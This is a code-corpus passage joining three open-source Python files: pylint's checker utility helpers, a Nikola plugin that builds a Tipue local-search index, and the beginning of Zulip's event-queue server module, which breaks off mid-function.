def check_messages(*messages):
"""decorator to store messages that are handled by a checker method"""
def store_messages(func):
func.checks_msgs = messages
return func
return store_messages
class IncompleteFormatString(Exception):
"""A format string ended in the middle of a format specifier."""
pass
class UnsupportedFormatCharacter(Exception):
"""A format character in a format string is not one of the supported
format characters."""
def __init__(self, index):
Exception.__init__(self, index)
self.index = index
def parse_format_string(format_string):
"""Parses a format string, returning a tuple of (keys, num_args), where keys
is the set of mapping keys in the format string, and num_args is the number
of arguments required by the format string. Raises
IncompleteFormatString or UnsupportedFormatCharacter if a
parse error occurs."""
keys = set()
num_args = 0
def next_char(i):
i += 1
if i == len(format_string):
raise IncompleteFormatString
return (i, format_string[i])
i = 0
while i < len(format_string):
char = format_string[i]
if char == '%':
i, char = next_char(i)
# Parse the mapping key (optional).
key = None
if char == '(':
depth = 1
i, char = next_char(i)
key_start = i
while depth != 0:
if char == '(':
depth += 1
elif char == ')':
depth -= 1
i, char = next_char(i)
key_end = i - 1
key = format_string[key_start:key_end]
# Parse the conversion flags (optional).
while char in '#0- +':
i, char = next_char(i)
# Parse the minimum field width (optional).
if char == '*':
num_args += 1
i, char = next_char(i)
else:
while char in string.digits:
i, char = next_char(i)
# Parse the precision (optional).
if char == '.':
i, char = next_char(i)
if char == '*':
num_args += 1
i, char = next_char(i)
else:
while char in string.digits:
i, char = next_char(i)
# Parse the length modifier (optional).
if char in 'hlL':
i, char = next_char(i)
# Parse the conversion type (mandatory).
if PY3K:
flags = 'diouxXeEfFgGcrs%a'
else:
flags = 'diouxXeEfFgGcrs%'
if char not in flags:
raise UnsupportedFormatCharacter(i)
if key:
keys.add(key)
elif char != '%':
num_args += 1
i += 1
return keys, num_args
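# Illustrative behaviour of parse_format_string (hypothetical inputs, not
# from the original test suite):
#
#   keys, num_args = parse_format_string('%(user)s has %d points (%.2f%%)')
#   # keys == set(['user']); num_args == 2 ('%d' and '%.2f' each consume
#   # one argument, while '%%' and the keyed '%(user)s' consume none)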
def is_attr_protected(attrname):
"""return True if attribute name is protected (start with _ and some other
details), False otherwise.
"""
return attrname[0] == '_' and attrname != '_' and not (
attrname.startswith('__') and attrname.endswith('__'))
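# For instance (illustrative): is_attr_protected('_cache') and
# is_attr_protected('__token') are truthy, while '_' and dunder names
# such as '__len__' are not considered protected.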
def node_frame_class(node):
"""return klass node for a method node (or a staticmethod or a
classmethod), return None otherwise
"""
klass = node.frame()
while klass is not None and not isinstance(klass, astroid.ClassDef):
if klass.parent is None:
klass = None
else:
klass = klass.parent.frame()
return klass
def is_attr_private(attrname):
"""Check that attribute name is private (at least two leading underscores,
at most one trailing underscore)
"""
regex = re.compile('^_{2,}.*[^_]+_?$')
return regex.match(attrname)
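# Examples (illustrative): '__secret' and '__secret_' match the private
# pattern; '_single' (one leading underscore) and '__dunder__' (two
# trailing underscores) do not.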
def get_argument_from_call(callfunc_node, position=None, keyword=None):
"""Returns the specified argument from a function call.
:param astroid.Call callfunc_node: Node representing a function call to check.
:param int position: position of the argument.
:param str keyword: the keyword of the argument.
:returns: The node representing the argument, None if the argument is not found.
:rtype: astroid.Name
:raises ValueError: if both position and keyword are None.
:raises NoSuchArgumentError: if no argument at the provided position or with
the provided keyword.
"""
if position is None and keyword is None:
raise ValueError('Must specify at least one of: position or keyword.')
if position is not None:
try:
return callfunc_node.args[position]
except IndexError:
pass
if keyword and callfunc_node.keywords:
for arg in callfunc_node.keywords:
if arg.arg == keyword:
return arg.value
raise NoSuchArgumentError
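# Minimal usage sketch (the call node is hypothetical):
#
#   # given a Call node for: foo(1, bar=2)
#   get_argument_from_call(call, position=0)    # -> the node for 1
#   get_argument_from_call(call, keyword='bar') # -> the node for 2
#   get_argument_from_call(call, keyword='baz') # raises NoSuchArgumentError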
def inherit_from_std_ex(node):
"""
Return true if the given class node is a subclass of
exceptions.Exception.
"""
if node.name in ('Exception', 'BaseException') \
and node.root().name == EXCEPTIONS_MODULE:
return True
return any(inherit_from_std_ex(parent)
for parent in node.ancestors(recurs=True))
def error_of_type(handler, error_type):
"""
Check if the given exception handler catches
the given error_type.
The *handler* parameter is a node, representing an ExceptHandler node.
The *error_type* can be an exception, such as AttributeError,
the name of an exception, or it can be a tuple of errors.
The function will return True if the handler catches any of the
given errors.
"""
def stringify_error(error):
if not isinstance(error, six.string_types):
return error.__name__
return error
if not isinstance(error_type, tuple):
error_type = (error_type, )
expected_errors = {stringify_error(error) for error in error_type}
if not handler.type:
# bare except. While this indeed catches anything, if the desired errors
# aren't specified directly, then we just ignore it.
return False
return handler.catch(expected_errors)
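# Sketch (handler would be an astroid.ExceptHandler; values illustrative):
#
#   # for a handler representing: except (OSError, KeyError):
#   error_of_type(handler, OSError)                  # True
#   error_of_type(handler, ('ValueError', KeyError)) # True, names work too
#   error_of_type(handler, TypeError)                # False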
def decorated_with_property(node):
""" Detect if the given function node is decorated with a property. """
if not node.decorators:
return False
for decorator in node.decorators.nodes:
if not isinstance(decorator, astroid.Name):
continue
try:
if _is_property_decorator(decorator):
return True
except astroid.InferenceError:
pass
return False
def _is_property_decorator(decorator):
for infered in decorator.infer():
if isinstance(infered, astroid.ClassDef):
if infered.root().name == BUILTINS_NAME and infered.name == 'property':
return True
for ancestor in infered.ancestors():
if ancestor.name == 'property' and ancestor.root().name == BUILTINS_NAME:
return True
def decorated_with(func, qnames):
"""Determine if the `func` node has a decorator with the qualified name `qname`."""
decorators = func.decorators.nodes if func.decorators else []
for decorator_node in decorators:
try:
if any(i is not None and i.qname() in qnames for i in decorator_node.infer()):
return True
except astroid.InferenceError:
continue
return False
@lru_cache(maxsize=1024)
def unimplemented_abstract_methods(node, is_abstract_cb=None):
"""
Get the unimplemented abstract methods for the given *node*.
A method can be considered abstract if the callback *is_abstract_cb*
returns a ``True`` value. The check defaults to verifying that
a method is decorated with abstract methods.
The function will work only for new-style classes. For old-style
classes, it will simply return an empty dictionary.
For the rest of them, it will return a dictionary of abstract method
names and their inferred objects.
"""
if is_abstract_cb is None:
is_abstract_cb = functools.partial(
decorated_with, qnames=ABC_METHODS)
visited = {}
try:
mro = reversed(node.mro())
except NotImplementedError:
# Old style class, it will not have a mro.
return {}
except astroid.ResolveError:
# Probably inconsistent hierarchy, don't try
# to figure this out here.
return {}
for ancestor in mro:
for obj in ancestor.values():
infered = obj
if isinstance(obj, astroid.AssignName):
infered = safe_infer(obj)
if not infered:
# Might be an abstract function,
# but since we don't have enough information
# in order to take this decision, we're taking
# the *safe* decision instead.
if obj.name in visited:
del visited[obj.name]
continue
if not isinstance(infered, astroid.FunctionDef):
if obj.name in visited:
del visited[obj.name]
if isinstance(infered, astroid.FunctionDef):
# It's critical to use the original name,
# since after inferring, an object can be something
# else than expected, as in the case of the
# following assignment.
#
# class A:
# def keys(self): pass
# __iter__ = keys
abstract = is_abstract_cb(infered)
if abstract:
visited[obj.name] = infered
elif not abstract and obj.name in visited:
del visited[obj.name]
return visited
def _import_node_context(node):
current = node
ignores = (astroid.ExceptHandler, astroid.TryExcept)
while current and not isinstance(current.parent, ignores):
current = current.parent
if current and isinstance(current.parent, ignores):
return current.parent
return None
def is_from_fallback_block(node):
"""Check if the given node is from a fallback import block."""
context = _import_node_context(node)
if not context:
return False
if isinstance(context, astroid.ExceptHandler):
other_body = context.parent.body
handlers = context.parent.handlers
else:
other_body = itertools.chain.from_iterable(
handler.body for handler in context.handlers)
handlers = context.handlers
has_fallback_imports = any(isinstance(import_node, (astroid.ImportFrom, astroid.Import))
for import_node in other_body)
ignores_import_error = _except_handlers_ignores_exception(handlers, ImportError)
return ignores_import_error or has_fallback_imports
def _except_handlers_ignores_exception(handlers, exception):
func = functools.partial(error_of_type,
error_type=(exception, ))
return any(map(func, handlers))
def node_ignores_exception(node, exception):
"""Check if the node is in a TryExcept which handles the given exception."""
current = node
ignores = (astroid.ExceptHandler, astroid.TryExcept)
while current and not isinstance(current.parent, ignores):
current = current.parent
if current and isinstance(current.parent, astroid.TryExcept):
return _except_handlers_ignores_exception(current.parent.handlers, exception)
return False
def class_is_abstract(node):
"""return true if the given class node should be considered as an abstract
class
"""
for method in node.methods():
if method.parent.frame() is node:
if method.is_abstract(pass_is_abstract=False):
return True
return False
def _supports_protocol_method(value, attr):
try:
attributes = value.getattr(attr)
except astroid.NotFoundError:
return False
first = attributes[0]
if isinstance(first, astroid.AssignName):
if isinstance(first.parent.value, astroid.Const):
return False
return True
def is_comprehension(node):
comprehensions = (astroid.ListComp,
astroid.SetComp,
astroid.DictComp,
astroid.GeneratorExp)
return isinstance(node, comprehensions)
def _supports_mapping_protocol(value):
return (
_supports_protocol_method(value, GETITEM_METHOD)
and _supports_protocol_method(value, KEYS_METHOD)
)
def _supports_membership_test_protocol(value):
return _supports_protocol_method(value, CONTAINS_METHOD)
def _supports_iteration_protocol(value):
return (
_supports_protocol_method(value, ITER_METHOD)
or _supports_protocol_method(value, GETITEM_METHOD)
)
def _supports_getitem_protocol(value):
return _supports_protocol_method(value, GETITEM_METHOD)
def _supports_setitem_protocol(value):
return _supports_protocol_method(value, SETITEM_METHOD)
def _supports_delitem_protocol(value):
return _supports_protocol_method(value, DELITEM_METHOD)
def _is_abstract_class_name(name):
lname = name.lower()
is_mixin = lname.endswith('mixin')
is_abstract = lname.startswith('abstract')
is_base = lname.startswith('base') or lname.endswith('base')
return is_mixin or is_abstract or is_base
def is_inside_abstract_class(node):
while node is not None:
if isinstance(node, astroid.ClassDef):
if class_is_abstract(node):
return True
name = getattr(node, 'name', None)
if name is not None and _is_abstract_class_name(name):
return True
node = node.parent
return False
def _supports_protocol(value, protocol_callback):
if isinstance(value, astroid.ClassDef):
if not has_known_bases(value):
return True
# classobj can only be iterable if it has an iterable metaclass
meta = value.metaclass()
if meta is not None:
if protocol_callback(meta):
return True
if isinstance(value, astroid.BaseInstance):
if not has_known_bases(value):
return True
if protocol_callback(value):
return True
# TODO: this is not needed in astroid 2.0, where we can
# check the type using a virtual base class instead.
if (isinstance(value, _bases.Proxy)
and isinstance(value._proxied, astroid.BaseInstance)
and has_known_bases(value._proxied)):
value = value._proxied
return protocol_callback(value)
return False
def is_iterable(value):
return _supports_protocol(value, _supports_iteration_protocol)
def is_mapping(value):
return _supports_protocol(value, _supports_mapping_protocol)
def supports_membership_test(value):
supported = _supports_protocol(value, _supports_membership_test_protocol)
return supported or is_iterable(value)
def supports_getitem(value):
return _supports_protocol(value, _supports_getitem_protocol)
def supports_setitem(value):
return _supports_protocol(value, _supports_setitem_protocol)
def supports_delitem(value):
return _supports_protocol(value, _supports_delitem_protocol)
# TODO(cpopa): deprecate these or leave them as aliases?
@lru_cache(maxsize=1024)
def safe_infer(node, context=None):
"""Return the inferred value for the given node.
Return None if inference failed or if there is some ambiguity (more than
one node has been inferred).
"""
try:
inferit = node.infer(context=context)
value = next(inferit)
except astroid.InferenceError:
return
try:
next(inferit)
return # None if there is ambiguity on the inferred node
except astroid.InferenceError:
return # there is some kind of ambiguity
except StopIteration:
return value
def has_known_bases(klass, context=None):
"""Return true if all base classes of a class could be inferred."""
try:
return klass._all_bases_known
except AttributeError:
pass
for base in klass.bases:
result = safe_infer(base, context=context)
# TODO: check for A->B->A->B pattern in class structure too?
if (not isinstance(result, astroid.ClassDef) or
result is klass or
not has_known_bases(result, context=context)):
klass._all_bases_known = False
return False
klass._all_bases_known = True
return True
def is_none(node):
return (node is None or
(isinstance(node, astroid.Const) and node.value is None) or
(isinstance(node, astroid.Name) and node.name == 'None')
)
def node_type(node):
"""Return the inferred type for `node`
If there is more than one possible type, or if inferred type is YES or None,
return None
"""
# check there is only one possible type for the assign node. Else we
# don't handle it for now
types = set()
try:
for var_type in node.infer():
if var_type == astroid.YES or is_none(var_type):
continue
types.add(var_type)
if len(types) > 1:
return
except astroid.InferenceError:
return
return types.pop() if types else None
def is_registered_in_singledispatch_function(node):
"""Check if the given function node is a singledispatch function."""
singledispatch_qnames = (
'functools.singledispatch',
'singledispatch.singledispatch'
)
if not isinstance(node, astroid.FunctionDef):
return False
decorators = node.decorators.nodes if node.decorators else []
for decorator in decorators:
# func.register are function calls
if not isinstance(decorator, astroid.Call):
continue
func = decorator.func
if not isinstance(func, astroid.Attribute) or func.attrname != 'register':
continue
try:
func_def = next(func.expr.infer())
except astroid.InferenceError:
continue
if isinstance(func_def, astroid.FunctionDef):
return decorated_with(func_def, singledispatch_qnames)
return False
| mit |
getnikola/plugins | v7/localsearch/localsearch/__init__.py | 1 | 4350 | # -*- coding: utf-8 -*-
# Copyright Β© 2012-2014 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from __future__ import unicode_literals
import codecs
import json
import os
from nikola.plugin_categories import LateTask
from nikola.utils import apply_filters, config_changed, copy_tree, makedirs
# This is what we need to produce:
# var tipuesearch = {"pages": [
# {"title": "Tipue Search, a jQuery site search engine", "text": "Tipue
# Search is a site search engine jQuery plugin. It's free for both commercial and
# non-commercial use and released under the MIT License. Tipue Search includes
# features such as word stemming and word replacement.", "tags": "JavaScript",
# "loc": "http://www.tipue.com/search"},
# {"title": "Tipue Search demo", "text": "Tipue Search demo. Tipue Search is
# a site search engine jQuery plugin.", "tags": "JavaScript", "loc":
# "http://www.tipue.com/search/demo"},
# {"title": "About Tipue", "text": "Tipue is a small web development/design
# studio based in North London. We've been around for over a decade.", "tags": "",
# "loc": "http://www.tipue.com/about"}
# ]};
class Tipue(LateTask):
"""Render the blog posts as JSON data."""
name = "localsearch"
def gen_tasks(self):
self.site.scan_posts()
kw = {
"translations": self.site.config['TRANSLATIONS'],
"output_folder": self.site.config['OUTPUT_FOLDER'],
"filters": self.site.config['FILTERS'],
"timeline": self.site.timeline,
}
posts = self.site.timeline[:]
dst_path = os.path.join(kw["output_folder"], "assets", "js",
"tipuesearch_content.js")
def save_data():
pages = []
for lang in kw["translations"]:
for post in posts:
# Don't index drafts (Issue #387)
if post.is_draft or post.is_private or post.publish_later:
continue
text = post.text(lang, strip_html=True)
text = text.replace('^', '')
data = {}
data["title"] = post.title(lang)
data["text"] = text
data["tags"] = ",".join(post.tags)
data["url"] = post.permalink(lang, absolute=True)
pages.append(data)
output = json.dumps({"pages": pages}, indent=2)
output = 'var tipuesearch = ' + output + ';'
makedirs(os.path.dirname(dst_path))
with codecs.open(dst_path, "wb+", "utf8") as fd:
fd.write(output)
task = {
"basename": str(self.name),
"name": dst_path,
"targets": [dst_path],
"actions": [(save_data, [])],
'uptodate': [config_changed(kw)],
'calc_dep': ['_scan_locs:sitemap']
}
yield apply_filters(task, kw['filters'])
# Copy all the assets to the right places
asset_folder = os.path.join(os.path.dirname(__file__), "files")
for task in copy_tree(asset_folder, kw["output_folder"]):
task["basename"] = str(self.name)
yield apply_filters(task, kw['filters'])
| mit |
udxxabp/zulip | zerver/lib/event_queue.py | 115 | 29293 | from __future__ import absolute_import
from django.conf import settings
from django.utils.timezone import now
from collections import deque
import datetime
import os
import time
import socket
import logging
import ujson
import requests
import cPickle as pickle
import atexit
import sys
import signal
import tornado
import random
import traceback
from zerver.lib.cache import cache_get_many, message_cache_key, \
user_profile_by_id_cache_key, cache_save_user_profile
from zerver.lib.cache_helpers import cache_with_key
from zerver.lib.utils import statsd
from zerver.middleware import async_request_restart
from zerver.models import get_client, Message
from zerver.lib.narrow import build_narrow_filter
from zerver.lib.queue import queue_json_publish
from zerver.lib.timestamp import timestamp_to_datetime
import copy
# The idle timeout used to be a week, but we found that in that
# situation, queues from dead browser sessions would grow quite large
# due to the accumulation of message data in those queues.
IDLE_EVENT_QUEUE_TIMEOUT_SECS = 60 * 10
EVENT_QUEUE_GC_FREQ_MSECS = 1000 * 60 * 5
# Capped limit for how long a client can request an event queue
# to live
MAX_QUEUE_TIMEOUT_SECS = 7 * 24 * 60 * 60
# The heartbeats effectively act as a server-side timeout for
# get_events(). The actual timeout value is randomized for each
# client connection based on the below value. We ensure that the
# maximum timeout value is 55 seconds, to deal with crappy home
# wireless routers that kill "inactive" http connections.
HEARTBEAT_MIN_FREQ_SECS = 45
class ClientDescriptor(object):
def __init__(self, user_profile_id, realm_id, event_queue, event_types, client_type,
apply_markdown=True, all_public_streams=False, lifespan_secs=0,
narrow=[]):
# These objects are serialized on shutdown and restored on restart.
# If fields are added or semantics are changed, temporary code must be
# added to load_event_queues() to update the restored objects.
# Additionally, the to_dict and from_dict methods must be updated
self.user_profile_id = user_profile_id
self.realm_id = realm_id
self.current_handler = None
self.event_queue = event_queue
self.queue_timeout = lifespan_secs
self.event_types = event_types
self.last_connection_time = time.time()
self.apply_markdown = apply_markdown
self.all_public_streams = all_public_streams
self.client_type = client_type
self._timeout_handle = None
self.narrow = narrow
self.narrow_filter = build_narrow_filter(narrow)
# Clamp queue_timeout to between minimum and maximum timeouts
self.queue_timeout = max(IDLE_EVENT_QUEUE_TIMEOUT_SECS, min(self.queue_timeout, MAX_QUEUE_TIMEOUT_SECS))
def to_dict(self):
# If you add a new key to this dict, make sure you add appropriate
# migration code in from_dict or load_event_queues to account for
# loading event queues that lack that key.
return dict(user_profile_id=self.user_profile_id,
realm_id=self.realm_id,
event_queue=self.event_queue.to_dict(),
queue_timeout=self.queue_timeout,
event_types=self.event_types,
last_connection_time=self.last_connection_time,
apply_markdown=self.apply_markdown,
all_public_streams=self.all_public_streams,
narrow=self.narrow,
client_type=self.client_type.name)
@classmethod
def from_dict(cls, d):
ret = cls(d['user_profile_id'], d['realm_id'],
EventQueue.from_dict(d['event_queue']), d['event_types'],
get_client(d['client_type']), d['apply_markdown'], d['all_public_streams'],
d['queue_timeout'], d.get('narrow', []))
ret.last_connection_time = d['last_connection_time']
return ret
def prepare_for_pickling(self):
self.current_handler = None
self._timeout_handle = None
def add_event(self, event):
if self.current_handler is not None:
async_request_restart(self.current_handler._request)
self.event_queue.push(event)
self.finish_current_handler()
def finish_current_handler(self):
if self.current_handler is not None:
err_msg = "Got error finishing handler for queue %s" % (self.event_queue.id,)
try:
# We call async_request_restart here in case we are
# being finished without any events (because another
# get_events request has supplanted this request)
async_request_restart(self.current_handler._request)
self.current_handler._request._log_data['extra'] = "[%s/1]" % (self.event_queue.id,)
self.current_handler.zulip_finish(dict(result='success', msg='',
events=self.event_queue.contents(),
queue_id=self.event_queue.id),
self.current_handler._request,
apply_markdown=self.apply_markdown)
except IOError as e:
if e.message != 'Stream is closed':
logging.exception(err_msg)
except AssertionError as e:
if e.message != 'Request closed':
logging.exception(err_msg)
except Exception:
logging.exception(err_msg)
finally:
self.disconnect_handler()
return True
return False
def accepts_event(self, event):
if self.event_types is not None and event["type"] not in self.event_types:
return False
if event["type"] == "message":
return self.narrow_filter(event)
return True
# TODO: Refactor so we don't need this function
def accepts_messages(self):
return self.event_types is None or "message" in self.event_types
def idle(self, now):
if not hasattr(self, 'queue_timeout'):
self.queue_timeout = IDLE_EVENT_QUEUE_TIMEOUT_SECS
return (self.current_handler is None
and now - self.last_connection_time >= self.queue_timeout)
def connect_handler(self, handler):
self.current_handler = handler
handler.client_descriptor = self
self.last_connection_time = time.time()
def timeout_callback():
self._timeout_handle = None
# All clients get heartbeat events
self.add_event(dict(type='heartbeat'))
ioloop = tornado.ioloop.IOLoop.instance()
heartbeat_time = time.time() + HEARTBEAT_MIN_FREQ_SECS + random.randint(0, 10)
if self.client_type.name != 'API: heartbeat test':
self._timeout_handle = ioloop.add_timeout(heartbeat_time, timeout_callback)
def disconnect_handler(self, client_closed=False):
if self.current_handler:
self.current_handler.client_descriptor = None
if client_closed:
request = self.current_handler._request
logging.info("Client disconnected for queue %s (%s via %s)" % \
(self.event_queue.id, request._email, request.client.name))
self.current_handler = None
if self._timeout_handle is not None:
ioloop = tornado.ioloop.IOLoop.instance()
ioloop.remove_timeout(self._timeout_handle)
self._timeout_handle = None
def cleanup(self):
do_gc_event_queues([self.event_queue.id], [self.user_profile_id],
[self.realm_id])
def compute_full_event_type(event):
if event["type"] == "update_message_flags":
if event["all"]:
# Put the "all" case in its own category
return "all_flags/%s/%s" % (event["flag"], event["operation"])
return "flags/%s/%s" % (event["operation"], event["flag"])
return event["type"]
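# Illustrative mapping (hypothetical events, not an exhaustive list):
#
#   compute_full_event_type(dict(type='update_message_flags', all=True,
#                                flag='read', operation='add'))
#   # -> 'all_flags/read/add'
#   compute_full_event_type(dict(type='update_message_flags', all=False,
#                                flag='starred', operation='remove'))
#   # -> 'flags/remove/starred'
#   compute_full_event_type(dict(type='message'))  # -> 'message'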
class EventQueue(object):
def __init__(self, id):
self.queue = deque()
self.next_event_id = 0
self.id = id
self.virtual_events = {}
def to_dict(self):
# If you add a new key to this dict, make sure you add appropriate
# migration code in from_dict or load_event_queues to account for
# loading event queues that lack that key.
return dict(id=self.id,
next_event_id=self.next_event_id,
queue=list(self.queue),
virtual_events=self.virtual_events)
@classmethod
def from_dict(cls, d):
ret = cls(d['id'])
ret.next_event_id = d['next_event_id']
ret.queue = deque(d['queue'])
ret.virtual_events = d.get("virtual_events", {})
return ret
def push(self, event):
event['id'] = self.next_event_id
self.next_event_id += 1
full_event_type = compute_full_event_type(event)
if (full_event_type in ["pointer", "restart"] or
full_event_type.startswith("flags/")):
if full_event_type not in self.virtual_events:
self.virtual_events[full_event_type] = copy.deepcopy(event)
return
# Update the virtual event with the values from the event
virtual_event = self.virtual_events[full_event_type]
virtual_event["id"] = event["id"]
if "timestamp" in event:
virtual_event["timestamp"] = event["timestamp"]
if full_event_type == "pointer":
virtual_event["pointer"] = event["pointer"]
elif full_event_type == "restart":
virtual_event["server_generation"] = event["server_generation"]
elif full_event_type.startswith("flags/"):
virtual_event["messages"] += event["messages"]
else:
self.queue.append(event)
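# Sketch of the coalescing above (ids and values are illustrative):
#
#   q = EventQueue('42:0')
#   q.push(dict(type='pointer', pointer=5))
#   q.push(dict(type='pointer', pointer=9))
#   # q.queue stays empty; q.virtual_events holds a single 'pointer'
#   # event with pointer == 9 and the id of the later push (1), which
#   # contents() later merges back into the stream in id order.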
# Note that pop ignores virtual events. This is fine in our
# current usage since virtual events should always be resolved to
# a real event before being given to users.
def pop(self):
return self.queue.popleft()
def empty(self):
return len(self.queue) == 0 and len(self.virtual_events) == 0
# See the comment on pop; that applies here as well
def prune(self, through_id):
while len(self.queue) != 0 and self.queue[0]['id'] <= through_id:
self.pop()
def contents(self):
contents = []
virtual_id_map = {}
for event_type in self.virtual_events:
virtual_id_map[self.virtual_events[event_type]["id"]] = self.virtual_events[event_type]
virtual_ids = sorted(list(virtual_id_map.keys()))
# Merge the virtual events into their final place in the queue
index = 0
length = len(virtual_ids)
for event in self.queue:
while index < length and virtual_ids[index] < event["id"]:
contents.append(virtual_id_map[virtual_ids[index]])
index += 1
contents.append(event)
while index < length:
contents.append(virtual_id_map[virtual_ids[index]])
index += 1
self.virtual_events = {}
self.queue = deque(contents)
return contents
# maps queue ids to client descriptors
clients = {}
# maps user id to list of client descriptors
user_clients = {}
# maps realm id to list of client descriptors with all_public_streams=True
realm_clients_all_streams = {}
# list of registered gc hooks.
# each one will be called with a user profile id, queue, and bool
# last_for_client that is true if this is the last queue pertaining
# to this user_profile_id
# that is about to be deleted
gc_hooks = []
next_queue_id = 0
def add_client_gc_hook(hook):
gc_hooks.append(hook)
def get_client_descriptor(queue_id):
return clients.get(queue_id)
def get_client_descriptors_for_user(user_profile_id):
return user_clients.get(user_profile_id, [])
def get_client_descriptors_for_realm_all_streams(realm_id):
return realm_clients_all_streams.get(realm_id, [])
def add_to_client_dicts(client):
user_clients.setdefault(client.user_profile_id, []).append(client)
if client.all_public_streams or client.narrow != []:
realm_clients_all_streams.setdefault(client.realm_id, []).append(client)
def allocate_client_descriptor(user_profile_id, realm_id, event_types, client_type,
apply_markdown, all_public_streams, lifespan_secs,
narrow=[]):
global next_queue_id
id = str(settings.SERVER_GENERATION) + ':' + str(next_queue_id)
next_queue_id += 1
client = ClientDescriptor(user_profile_id, realm_id, EventQueue(id), event_types, client_type,
apply_markdown, all_public_streams, lifespan_secs, narrow)
clients[id] = client
add_to_client_dicts(client)
return client
def do_gc_event_queues(to_remove, affected_users, affected_realms):
def filter_client_dict(client_dict, key):
if key not in client_dict:
return
new_client_list = filter(lambda c: c.event_queue.id not in to_remove,
client_dict[key])
if len(new_client_list) == 0:
del client_dict[key]
else:
client_dict[key] = new_client_list
for user_id in affected_users:
filter_client_dict(user_clients, user_id)
for realm_id in affected_realms:
filter_client_dict(realm_clients_all_streams, realm_id)
for id in to_remove:
for cb in gc_hooks:
cb(clients[id].user_profile_id, clients[id], clients[id].user_profile_id not in user_clients)
del clients[id]
def gc_event_queues():
start = time.time()
to_remove = set()
affected_users = set()
affected_realms = set()
for (id, client) in clients.iteritems():
if client.idle(start):
to_remove.add(id)
affected_users.add(client.user_profile_id)
affected_realms.add(client.realm_id)
do_gc_event_queues(to_remove, affected_users, affected_realms)
logging.info(('Tornado removed %d idle event queues owned by %d users in %.3fs.'
+ ' Now %d active queues')
% (len(to_remove), len(affected_users), time.time() - start,
len(clients)))
statsd.gauge('tornado.active_queues', len(clients))
statsd.gauge('tornado.active_users', len(user_clients))
def dump_event_queues():
start = time.time()
with file(settings.JSON_PERSISTENT_QUEUE_FILENAME, "w") as stored_queues:
ujson.dump([(qid, client.to_dict()) for (qid, client) in clients.iteritems()],
stored_queues)
logging.info('Tornado dumped %d event queues in %.3fs'
% (len(clients), time.time() - start))
def load_event_queues():
global clients
start = time.time()
if os.path.exists(settings.PERSISTENT_QUEUE_FILENAME):
try:
with file(settings.PERSISTENT_QUEUE_FILENAME, "r") as stored_queues:
clients = pickle.load(stored_queues)
except (IOError, EOFError):
pass
else:
# ujson chokes on bad input pretty easily. We separate out the actual
# file reading from the loading so that we don't silently fail if we get
# bad input.
try:
with file(settings.JSON_PERSISTENT_QUEUE_FILENAME, "r") as stored_queues:
json_data = stored_queues.read()
try:
clients = dict((qid, ClientDescriptor.from_dict(client))
for (qid, client) in ujson.loads(json_data))
except Exception:
logging.exception("Could not deserialize event queues")
except (IOError, EOFError):
pass
for client in clients.itervalues():
# Put code for migrations due to event queue data format changes here
add_to_client_dicts(client)
logging.info('Tornado loaded %d event queues in %.3fs'
% (len(clients), time.time() - start))
def send_restart_events():
event = dict(type='restart', server_generation=settings.SERVER_GENERATION)
for client in clients.itervalues():
if client.accepts_event(event):
client.add_event(event.copy())
def setup_event_queue():
load_event_queues()
atexit.register(dump_event_queues)
# Make sure we dump event queues even if we exit via signal
signal.signal(signal.SIGTERM, lambda signum, stack: sys.exit(1))
try:
os.rename(settings.PERSISTENT_QUEUE_FILENAME, "/var/tmp/event_queues.pickle.last")
except OSError:
pass
try:
os.rename(settings.JSON_PERSISTENT_QUEUE_FILENAME, "/var/tmp/event_queues.json.last")
except OSError:
pass
# Set up event queue garbage collection
ioloop = tornado.ioloop.IOLoop.instance()
pc = tornado.ioloop.PeriodicCallback(gc_event_queues,
EVENT_QUEUE_GC_FREQ_MSECS, ioloop)
pc.start()
send_restart_events()
# The following functions are called from Django
# Workaround to support the Python-requests 1.0 transition of .json
# from a property to a function
requests_json_is_function = callable(requests.Response.json)
def extract_json_response(resp):
if requests_json_is_function:
return resp.json()
else:
return resp.json
def request_event_queue(user_profile, user_client, apply_markdown,
queue_lifespan_secs, event_types=None, all_public_streams=False,
narrow=[]):
if settings.TORNADO_SERVER:
req = {'dont_block' : 'true',
'apply_markdown': ujson.dumps(apply_markdown),
'all_public_streams': ujson.dumps(all_public_streams),
'client' : 'internal',
'user_client' : user_client.name,
'narrow' : ujson.dumps(narrow),
'lifespan_secs' : queue_lifespan_secs}
if event_types is not None:
req['event_types'] = ujson.dumps(event_types)
resp = requests.get(settings.TORNADO_SERVER + '/api/v1/events',
auth=requests.auth.HTTPBasicAuth(user_profile.email,
user_profile.api_key),
params=req)
resp.raise_for_status()
return extract_json_response(resp)['queue_id']
return None
def get_user_events(user_profile, queue_id, last_event_id):
if settings.TORNADO_SERVER:
resp = requests.get(settings.TORNADO_SERVER + '/api/v1/events',
auth=requests.auth.HTTPBasicAuth(user_profile.email,
user_profile.api_key),
params={'queue_id' : queue_id,
'last_event_id': last_event_id,
'dont_block' : 'true',
'client' : 'internal'})
resp.raise_for_status()
return extract_json_response(resp)['events']
# Send email notifications to idle users
# after they are idle for 1 hour
NOTIFY_AFTER_IDLE_HOURS = 1
def build_offline_notification(user_profile_id, message_id):
return {"user_profile_id": user_profile_id,
"message_id": message_id,
"timestamp": time.time()}
def missedmessage_hook(user_profile_id, queue, last_for_client):
# Only process missedmessage hook when the last queue for a
# client has been garbage collected
if not last_for_client:
return
message_ids_to_notify = []
for event in queue.event_queue.contents():
if not event['type'] == 'message' or not event['flags']:
continue
if 'mentioned' in event['flags'] and not 'read' in event['flags']:
notify_info = dict(message_id=event['message']['id'])
if not event.get('push_notified', False):
notify_info['send_push'] = True
if not event.get('email_notified', False):
notify_info['send_email'] = True
